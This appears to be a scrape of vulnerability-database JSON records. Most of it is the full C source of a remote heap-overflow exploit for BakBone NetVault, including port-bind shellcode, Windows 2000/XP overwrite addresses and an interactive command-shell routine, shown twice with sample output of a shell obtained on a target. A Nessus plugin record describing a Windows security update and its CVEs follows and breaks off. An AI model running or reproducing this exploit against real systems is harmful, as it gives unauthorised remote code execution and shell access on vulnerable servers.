-1)\r\n\t\t{\r\n\t\t\t\tprintf(\"[x] Failed to inject packet! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\t\t\r\n\t\tprintf(\"[*] Sleeping.\");\r\n\t\tfor(s=0;s<8;s++)\r\n\t\t{ //wait for it to catch\r\n\t\t\tprintf(\".\");\r\n\t\t\tSleep(500);\r\n\t\t}\r\n\t\tclosesocket(sockTCP);\r\n\t\tfor(s=0;s<5;s++)\r\n\t\t{\r\n\t\t\tprintf(\".\");\r\n\t\t\tSleep(500);\r\n\t\t} //exploit triggers when you reconnect sometimes\r\n\t\tprintf(\"\\n[*] Connecting again to trigger overflow..\\n\");\r\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t\t{ \r\n\t\t\t\tprintf(\"[x] Socket not initialized! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\r\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\r\n\t\t{\r\n\t\t\tprintf(\"[*] Connection to host failed! Exiting...\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t} \t\t\r\n\t\tSleep(500);\r\n\t\tclosesocket(sockTCP);\r\n\t\t\t\t\r\n\t\tprintf(\"[*] Connecting to host: %s on port 101\\n\",argv[2]);\r\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t\t{\r\n\t\t\t\tprintf(\"[x] Socket not initialized! 
Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\r\n\t\ttargetTCP.sin_port= htons(101);\r\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\r\n\t\t{\r\n\t\t\tprintf(\"[*] Connection to host failed! Exiting...\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t} \t\t\r\n\t\tprintf(\"[*] Exploit worked! dropping into shell\\n\");\r\n\t\tcmdshell(sockTCP);\r\n\t\tWSACleanup();\r\n\t\texit(1);\r\n\t\treturn 0;\r\n}\r\n/*\r\nTaken from some random exploit.\r\ngood, simple cmdshell function.\r\n*/\r\nvoid cmdshell (int sock)\r\n{\r\n struct timeval tv;\r\n int length;\r\n unsigned long o[2];\r\n char buffer[1000];\r\n \r\n tv.tv_sec = 1;\r\n tv.tv_usec = 0;\r\n\r\n while (1) \r\n {\r\n\to[0] = 1;\r\n\to[1] = sock;\t\r\n\r\n\tlength = select (0, (fd_set *)&o, NULL, NULL, &tv);\r\n\tif(length == 1)\r\n\t{\r\n\t\tlength = recv (sock, buffer, sizeof (buffer), 0);\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf (\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t\tlength = write (1, buffer, length);\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf (\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n \tlength = read (0, buffer, sizeof (buffer));\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf(\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t\tlength = send(sock, buffer, length, 0);\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf(\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n}\r\n\r\n}\r\n/*********************************************************************************/\r\nlong gimmeip(char *hostname) \r\n{\r\n\tstruct hostent *he;\r\n\tlong ipaddr;\r\n\t\r\n\tif ((ipaddr = inet_addr(hostname)) < 0) \r\n\t{\r\n\t\tif ((he = gethostbyname(hostname)) == NULL) \r\n\t\t{\r\n\t\t\tprintf(\"[x] Failed to resolve host: %s! 
Exiting...\\n\\n\",hostname);\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t}\r\n\t\tmemcpy(&ipaddr, he->h_addr, he->h_length);\r\n\t}\t\r\n\treturn ipaddr;\r\n}\r\n/*********************************************************************************/\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2005-05-17T00:00:00", "references": [], "reporter": "nolimit", "modified": "2005-05-17T00:00:00", "href": "http://0day.today/exploit/description/8567"}, "lastseen": "2016-04-20T01:21:24", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "====================================================\r\nBakBone NetVault 6.x/7.x Remote Heap Buffer Overflow\r\n====================================================\r\n\r\n/* Bakbone Netvault heap overflow exploit. \r\nSoftware Hole discovered by BuzzDee\r\nPOC written by nolimit and BuzzDee.\r\n\r\nAs class101 has already shown, this application has a lot of holes. \r\nThis is another remote heap overflow. This was tested on the demo version\r\nof netvault. We considered mailing the vendor on this one, but figured we'd recieve\r\nthe same response class did, which was none. So perhaps a second critical vulnerabilty\r\nwill wake Bakbone up to their software faults. \r\n\r\nA note to skiddies about this exploit\r\nThis won't really net you a lot of elite b0xes because class101's isn't patched,\r\n so it's just as vulnerable as this. Not to mention the fact that not many businesses\r\n use this software anyway.\r\n ..Maybe it's because of all the holes??\r\n\r\nThx to Flare, AceHigh, Shift,class101, and of course BuzzDee.\r\nSorry.. 
everyone wants to be famous :)\r\n\r\n\r\n C:\\CODING\\c++\\netvault\\Release>netvault 1 2KVM\r\n[*] Target: 2KVM Port: 20031\r\n\r\nTargetting 2K..\r\n[*] Socket initialized...\r\n[*] Sending buffer.\r\n[*] Sleeping..............\r\n[*] Connecting again to trigger overflow..\r\n[*] Connecting to host: 2KVM on port 101\r\n[*] Exploit worked! dropping into shell\r\nMicrosoft Windows 2000 [Version 5.00.2195]\r\n(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nC:\\Program Files\\BakBone Software\\NetVault>\r\n[email\u00a0protected]\r\n*/\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <io.h>\r\n#include <winsock.h>\r\n#pragma comment(lib,\"ws2_32\")\r\n\r\nvoid cmdshell (int sock);\r\nlong gimmeip(char *hostname);\r\nchar buffer[40000];\r\n//initial request to host\r\nchar packet[]=\r\n\"\\x00\\x00\\x02\\x01\\x00\\x00\\x00\\x8F\\xD0\\xF0\\xCA\\x0B\\x00\\x00\\x00\\x69\"\r\n\"\\x3B\\x62\\x3B\\x6F\\x3B\\x6F\\x3B\\x7A\\x3B\\x00\\x11\\x57\\x3C\\x42\\x00\\x01\"\r\n\"\\xB9\\xF9\\xA2\\xC8\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x01\\xA5\\x97\"\r\n\"\\xF0\\xCA\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\\x00\\x00\\x00\\x10\"\r\n\"\\x02\\x4E\\x3F\\xAC\\x14\\xCC\\x0A\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\"\r\n\"\\xA5\\x97\\xF0\\xCA\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\\x00\\x00\"\r\n\"\\x00\\x10\\x02\\x4E\\x3F\\xC0\\xA8\\xEA\\xEB\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x01\\xA5\\x97\\xF0\\xCA\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\"\r\n\"\\x00\\x00\\x00\\x10\\x02\\x4E\\x3F\\xC2\\x97\\x2C\\xD3\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\xB9\\xF9\\xA2\\xC8\\x02\\x02\\x00\\x00\\x00\\xA5\\x97\\xF0\\xCA\"\r\n\"\\x05\\x00\\x00\\x00\\x6E\\x33\\x32\\x3B\\x00\\x20\\x
00\\x00\\x00\\x04\\x02\\x4E\"\r\n\"\\x3F\\xAC\\x14\\xCC\\x0A\\xB0\\xFC\\xE2\\x00\\x00\\x00\\x00\\x00\\xEC\\xFA\\x8E\"\r\n\"\\x01\\xA4\\x6B\\x41\\x00\\xE4\\xFA\\x8E\\x01\\xFF\\xFF\\xFF\\xFF\\x01\\x02\";\r\n//class101 modified shellcode from metasploit.com. yummy.\r\nchar shellcode[]=\r\n\t\"\\x33\\xC9\\x83\\xE9\\xAF\\xD9\\xEE\\xD9\\x74\\x24\\xF4\\x5B\\x81\\x73\\x13\\xBB\"\r\n\t\"\\x1E\\xD3\\x6A\\x83\\xEB\\xFC\\xE2\\xF4\\x47\\x74\\x38\\x25\\x53\\xE7\\x2C\\x95\"\r\n\t\"\\x44\\x7E\\x58\\x06\\x9F\\x3A\\x58\\x2F\\x87\\x95\\xAF\\x6F\\xC3\\x1F\\x3C\\xE1\"\r\n\t\"\\xF4\\x06\\x58\\x35\\x9B\\x1F\\x38\\x89\\x8B\\x57\\x58\\x5E\\x30\\x1F\\x3D\\x5B\"\r\n\t\"\\x7B\\x87\\x7F\\xEE\\x7B\\x6A\\xD4\\xAB\\x71\\x13\\xD2\\xA8\\x50\\xEA\\xE8\\x3E\"\r\n\t\"\\x9F\\x36\\xA6\\x89\\x30\\x41\\xF7\\x6B\\x50\\x78\\x58\\x66\\xF0\\x95\\x8C\\x76\"\r\n\t\"\\xBA\\xF5\\xD0\\x46\\x30\\x97\\xBF\\x4E\\xA7\\x7F\\x10\\x5B\\x7B\\x7A\\x58\\x2A\"\r\n\t\"\\x8B\\x95\\x93\\x66\\x30\\x6E\\xCF\\xC7\\x30\\x5E\\xDB\\x34\\xD3\\x90\\x9D\\x64\"\r\n\t\"\\x57\\x4E\\x2C\\xBC\\x8A\\xC5\\xB5\\x39\\xDD\\x76\\xE0\\x58\\xD3\\x69\\xA0\\x58\"\r\n\t\"\\xE4\\x4A\\x2C\\xBA\\xD3\\xD5\\x3E\\x96\\x80\\x4E\\x2C\\xBC\\xE4\\x97\\x36\\x0C\"\r\n\t\"\\x3A\\xF3\\xDB\\x68\\xEE\\x74\\xD1\\x95\\x6B\\x76\\x0A\\x63\\x4E\\xB3\\x84\\x95\"\r\n\t\"\\x6D\\x4D\\x80\\x39\\xE8\\x4D\\x90\\x39\\xF8\\x4D\\x2C\\xBA\\xDD\\x76\\xD3\\x0F\"\r\n\t\"\\xDD\\x4D\\x5A\\x8B\\x2E\\x76\\x77\\x70\\xCB\\xD9\\x84\\x95\\x6D\\x74\\xC3\\x3B\"\r\n\t\"\\xEE\\xE1\\x03\\x02\\x1F\\xB3\\xFD\\x83\\xEC\\xE1\\x05\\x39\\xEE\\xE1\\x03\\x02\"\r\n\t\"\\x5E\\x57\\x55\\x23\\xEC\\xE1\\x05\\x3A\\xEF\\x4A\\x86\\x95\\x6B\\x8D\\xBB\\x8D\"\r\n\t\"\\xC2\\xD8\\xAA\\x3D\\x44\\xC8\\x86\\x95\\x6B\\x78\\xB9\\x0E\\xDD\\x76\\xB0\\x07\"\r\n\t\"\\x32\\xFB\\xB9\\x3A\\xE2\\x37\\x1F\\xE3\\x5C\\x74\\x97\\xE3\\x59\\x2F\\x13\\x99\"\r\n\t\"\\x11\\xE0\\x91\\x47\\x45\\x5C\\xFF\\xF9\\x36\\x64\\xEB\\xC1\\x10\\xB5\\xBB\\x18\"\r\n\t\"\\x45\\xAD\\xC5\\x95\\xCE\\x5A\\x2C\\xBC\\xE0\\x49\\x81\\x3B\\xEA\\x4F\\xB9\\x6B\"\r\n\t\
"\\xEA\\x4F\\x86\\x3B\\x44\\xCE\\xBB\\xC7\\x62\\x1B\\x1D\\x39\\x44\\xC8\\xB9\\x95\"\r\n\t\"\\x44\\x29\\x2C\\xBA\\x30\\x49\\x2F\\xE9\\x7F\\x7A\\x2C\\xBC\\xE9\\xE1\\x03\\x02\" \r\n\t\"\\x54\\xD0\\x33\\x0A\\xE8\\xE1\\x05\\x95\\x6B\\x1E\\xD3\\x6A\";\r\n\r\nchar jmpToXP[]=\"\\xBD\\x9B\\x36\\x7C\"; //XP SP1\r\nchar uefOverWriteXP[]=\"\\xB4\\x73\\xED\\x77\";//XP SP1\r\nchar jmpTo2K[]=\"\\x7E\\x6D\\x03\\x75\"; //2k SP4\r\nchar uefOverWrite2K[]=\"\\x4C\\x14\\x54\\x7C\"; //2K SP4\r\n\r\nint main(int argc,char *argv[])\r\n{ \r\n\t\tWSADATA wsaData;\r\n\t\tstruct sockaddr_in targetTCP;\r\n\t\tint sockTCP,s;\r\n\t\tunsigned short port = 20031;\r\n\t\tlong ip;\r\n\t\tif(argc < 3)\r\n\t\t{\r\n\t\t\t\r\n\t\t\tprintf(\"Bakbone Netvault Remote Heap Overflow.\\n\"\r\n\t\t\t\t\"Usage: %s [Target] [address] <port>\\n\"\r\n\t\t\t\t\" eg: netvault.exe 1 127.0.0.1\\n\"\r\n\t\t\t\t\"Targets\\n1. Windows 2000\\n2. Windows XP SP0-1\\n\"\r\n\t\t\t\t\t\"Coded by [email\u00a0protected] and BuzzDee.\\n\",argv[0]);\r\n\t\t\treturn 1;\t\t\t\r\n\t\t}\t\t\r\n\t\tif(argc==4)\r\n\t\t\tport = atoi(argv[3]);\t\t\t\t\t\r\n WSAStartup(0x0202, &wsaData);\t\t\t\t\r\n\t\tprintf(\"[*] Target:\\t%s \\tPort: %d\\n\\n\",argv[2],port);\r\n\t\tip=gimmeip(argv[2]);\t\r\n targetTCP.sin_family = AF_INET;\r\n targetTCP.sin_addr.s_addr = ip;\r\n targetTCP.sin_port = htons(port);\r\n\t\tmemset(buffer,'\\x90',40000);\r\n\t\tmemcpy(buffer,packet,sizeof(packet)-1); //request packet\r\n\t\tmemcpy(buffer+32790,\"\\xEB\\x0C\",2); //JMP ahead over the 2 overwrites\r\n\t\tswitch(atoi(argv[1]))\r\n\t\t{\r\n\t\t\tcase 1:\r\n\t\t\tprintf(\"Targetting 2K..\\n\");\r\n\t\t\tmemcpy(buffer+32792,jmpTo2K,sizeof(jmpTo2K)-1); //overwrite pointer to CALL [EDI+74]\r\n\t\t\tmemcpy(buffer+32796,uefOverWrite2K,sizeof(uefOverWrite2K)-1); //UEF as chosen.\r\n\t\t\tbreak;\r\n\t\t\tcase 2:\r\n\t\t\tprintf(\"Targetting XP..\\n\");\r\n\t\t\tmemcpy(buffer+32792,jmpToXP,sizeof(jmpToXP)-1); //overwrite pointer to CALL 
[EDI+74]\r\n\t\t\tmemcpy(buffer+32796,uefOverWriteXP,sizeof(uefOverWriteXP)-1); //UEF as chosen.\r\n\t\t\tbreak;\r\n\t\t\tdefault:\r\n\t\t\tprintf(\"Error target not found.\\n\");\r\n\t\t\treturn 1;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tmemcpy(buffer+32820,shellcode,sizeof(shellcode)-1); //101 portbind thx class101/metasploit ;p\r\n\t\tmemcpy(buffer+39947,\"\\x00\\x00\\x00\",3); //all done! only 39950 bytes! ;P\r\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t\t{\r\n\t\t\t\tprintf(\"[x] Socket not initialized! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\r\n\t\tprintf(\"[*] Socket initialized...\\n\");\t\t\t\t\t\r\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\r\n\t\t{\r\n\t\t\tprintf(\"[*] Connection to host failed! Exiting...\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t} \t\t\r\n\t\tprintf(\"[*] Sending buffer.\\n\");\r\n\t\tSleep(1000);\r\n\t\tif (send(sockTCP, buffer, 39950,0) == -1)\r\n\t\t{\r\n\t\t\t\tprintf(\"[x] Failed to inject packet! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\t\t\r\n\t\tprintf(\"[*] Sleeping.\");\r\n\t\tfor(s=0;s<8;s++)\r\n\t\t{ //wait for it to catch\r\n\t\t\tprintf(\".\");\r\n\t\t\tSleep(500);\r\n\t\t}\r\n\t\tclosesocket(sockTCP);\r\n\t\tfor(s=0;s<5;s++)\r\n\t\t{\r\n\t\t\tprintf(\".\");\r\n\t\t\tSleep(500);\r\n\t\t} //exploit triggers when you reconnect sometimes\r\n\t\tprintf(\"\\n[*] Connecting again to trigger overflow..\\n\");\r\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t\t{ \r\n\t\t\t\tprintf(\"[x] Socket not initialized! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\r\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\r\n\t\t{\r\n\t\t\tprintf(\"[*] Connection to host failed! 
Exiting...\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t} \t\t\r\n\t\tSleep(500);\r\n\t\tclosesocket(sockTCP);\r\n\t\t\t\t\r\n\t\tprintf(\"[*] Connecting to host: %s on port 101\\n\",argv[2]);\r\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\r\n\t\t{\r\n\t\t\t\tprintf(\"[x] Socket not initialized! Exiting...\\n\");\r\n\t\t\t\tWSACleanup();\r\n return 1;\r\n\t\t}\r\n\t\ttargetTCP.sin_port= htons(101);\r\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\r\n\t\t{\r\n\t\t\tprintf(\"[*] Connection to host failed! Exiting...\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t} \t\t\r\n\t\tprintf(\"[*] Exploit worked! dropping into shell\\n\");\r\n\t\tcmdshell(sockTCP);\r\n\t\tWSACleanup();\r\n\t\texit(1);\r\n\t\treturn 0;\r\n}\r\n/*\r\nTaken from some random exploit.\r\ngood, simple cmdshell function.\r\n*/\r\nvoid cmdshell (int sock)\r\n{\r\n struct timeval tv;\r\n int length;\r\n unsigned long o[2];\r\n char buffer[1000];\r\n \r\n tv.tv_sec = 1;\r\n tv.tv_usec = 0;\r\n\r\n while (1) \r\n {\r\n\to[0] = 1;\r\n\to[1] = sock;\t\r\n\r\n\tlength = select (0, (fd_set *)&o, NULL, NULL, &tv);\r\n\tif(length == 1)\r\n\t{\r\n\t\tlength = recv (sock, buffer, sizeof (buffer), 0);\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf (\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t\tlength = write (1, buffer, length);\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf (\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n \tlength = read (0, buffer, sizeof (buffer));\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf(\"[x] Connection closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t\tlength = send(sock, buffer, length, 0);\r\n\t\tif (length <= 0) \r\n\t\t{\r\n\t\t\tprintf(\"[x] Connection 
closed.\\n\");\r\n\t\t\tWSACleanup();\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n}\r\n\r\n}\r\n/*********************************************************************************/\r\nlong gimmeip(char *hostname) \r\n{\r\n\tstruct hostent *he;\r\n\tlong ipaddr;\r\n\t\r\n\tif ((ipaddr = inet_addr(hostname)) < 0) \r\n\t{\r\n\t\tif ((he = gethostbyname(hostname)) == NULL) \r\n\t\t{\r\n\t\t\tprintf(\"[x] Failed to resolve host: %s! Exiting...\\n\\n\",hostname);\r\n\t\t\tWSACleanup();\r\n\t\t\texit(1);\r\n\t\t}\r\n\t\tmemcpy(&ipaddr, he->h_addr, he->h_length);\r\n\t}\t\r\n\treturn ipaddr;\r\n}\r\n/*********************************************************************************/\r\n\r\n\n# 0day.today [2018-01-01] #", "published": "2005-05-17T00:00:00", "references": [], "reporter": "nolimit", "modified": "2005-05-17T00:00:00", "href": "https://0day.today/exploit/description/8567"}
{"nessus": [{"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4467708.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Microsoft JScript that could allow an attacker to bypass\n Device Guard. (CVE-2018-8417)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8552)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8485, CVE-2018-8554, CVE-2018-8561)\n\n - A remote code execution vulnerability exists when\n PowerShell improperly handles specially crafted files.\n An attacker who successfully exploited this\n vulnerability could execute malicious code on a\n vulnerable system. (CVE-2018-8256)\n\n - A security feature bypass exists when Windows\n incorrectly validates kernel driver signatures. An\n attacker who successfully exploited this vulnerability\n could bypass security features and load improperly\n signed drivers into the kernel. In an attack scenario,\n an attacker could bypass security features intended to\n prevent improperly signed drivers from being loaded by\n the kernel. The update addresses the vulnerability by\n correcting how Windows validates kernel driver\n signatures. 
(CVE-2018-8549)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2018-8545)\n\n - A tampering vulnerability exists in PowerShell that\n could allow an attacker to execute unlogged code.\n (CVE-2018-8415)\n\n - A remote code execution vulnerability exists in the way\n that Windows Deployment Services TFTP Server handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute arbitrary code\n with elevated permissions on a target system.\n (CVE-2018-8476)\n\n - An elevation of privilege vulnerability exists in\n Windows 10 version 1809 when installed from physical\n media (USB, DVD, etc.) with the keep nothing option\n selected during installation. Successful exploitation of\n the vulnerability could allow an attacker to gain local\n access to an affected system. (CVE-2018-8592)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2018-8544)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8584)\n\n - An elevation of privilege exists in Windows COM\n Aggregate Marshaler. 
An attacker who successfully\n exploited the vulnerability could run arbitrary code\n with elevated privileges. (CVE-2018-8550)\n\n - An information disclosure vulnerability exists when\n Windows Audio Service fails to properly handle objects\n in memory. An attacker who successfully exploited the\n vulnerability could potentially disclose memory contents\n of a elevated process. (CVE-2018-8454)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8564)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n an open source customization for Microsoft Active\n Directory Federation Services (AD FS) does not properly\n sanitize a specially crafted web request to an affected\n AD FS server. An authenticated attacker could exploit\n the vulnerability by sending a specially crafted request\n to an affected AD FS server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run scripts in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_NOV_4467708.NASL", "href": "https://www.tenable.com/plugins/nessus/122820", "published": "2019-03-13T00:00:00", "title": "KB4467708: Windows 10 Version 1809 and Windows Server 2019 November 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122820);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\n \"CVE-2018-8256\",\n \"CVE-2018-8407\",\n \"CVE-2018-8415\",\n \"CVE-2018-8417\",\n \"CVE-2018-8454\",\n \"CVE-2018-8471\",\n \"CVE-2018-8476\",\n \"CVE-2018-8485\",\n \"CVE-2018-8541\",\n \"CVE-2018-8542\",\n \"CVE-2018-8543\",\n \"CVE-2018-8544\",\n \"CVE-2018-8545\",\n \"CVE-2018-8547\",\n \"CVE-2018-8549\",\n \"CVE-2018-8550\",\n \"CVE-2018-8551\",\n \"CVE-2018-8552\",\n \"CVE-2018-8554\",\n \"CVE-2018-8555\",\n \"CVE-2018-8556\",\n \"CVE-2018-8557\",\n \"CVE-2018-8561\",\n \"CVE-2018-8562\",\n \"CVE-2018-8564\",\n \"CVE-2018-8567\",\n \"CVE-2018-8584\",\n \"CVE-2018-8588\",\n \"CVE-2018-8592\"\n );\n script_bugtraq_id(\n 105770,\n 105771,\n 105772,\n 105773,\n 105774,\n 105775,\n 105779,\n 105780,\n 105781,\n 105782,\n 105784,\n 105785,\n 105786,\n 105787,\n 105788,\n 105790,\n 105792,\n 105794,\n 105795,\n 105799,\n 105800,\n 105801,\n 105803,\n 105805,\n 105808,\n 105809,\n 105811,\n 105813,\n 105846\n );\n script_xref(name:\"MSKB\", value:\"4467708\");\n script_xref(name:\"MSFT\", value:\"MS18-4467708\");\n\n script_name(english:\"KB4467708: Windows 10 Version 1809 and Windows Server 2019 November 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4467708.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Microsoft JScript that could allow an attacker to bypass\n Device Guard. 
(CVE-2018-8417)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8552)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8485, CVE-2018-8554, CVE-2018-8561)\n\n - A remote code execution vulnerability exists when\n PowerShell improperly handles specially crafted files.\n An attacker who successfully exploited this\n vulnerability could execute malicious code on a\n vulnerable system. (CVE-2018-8256)\n\n - A security feature bypass exists when Windows\n incorrectly validates kernel driver signatures. An\n attacker who successfully exploited this vulnerability\n could bypass security features and load improperly\n signed drivers into the kernel. In an attack scenario,\n an attacker could bypass security features intended to\n prevent improperly signed drivers from being loaded by\n the kernel. The update addresses the vulnerability by\n correcting how Windows validates kernel driver\n signatures. (CVE-2018-8549)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. 
(CVE-2018-8545)\n\n - A tampering vulnerability exists in PowerShell that\n could allow an attacker to execute unlogged code.\n (CVE-2018-8415)\n\n - A remote code execution vulnerability exists in the way\n that Windows Deployment Services TFTP Server handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute arbitrary code\n with elevated permissions on a target system.\n (CVE-2018-8476)\n\n - An elevation of privilege vulnerability exists in\n Windows 10 version 1809 when installed from physical\n media (USB, DVD, etc.) with the keep nothing option\n selected during installation. Successful exploitation of\n the vulnerability could allow an attacker to gain local\n access to an affected system. (CVE-2018-8592)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2018-8544)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8584)\n\n - An elevation of privilege exists in Windows COM\n Aggregate Marshaler. An attacker who successfully\n exploited the vulnerability could run arbitrary code\n with elevated privileges. (CVE-2018-8550)\n\n - An information disclosure vulnerability exists when\n Windows Audio Service fails to properly handle objects\n in memory. 
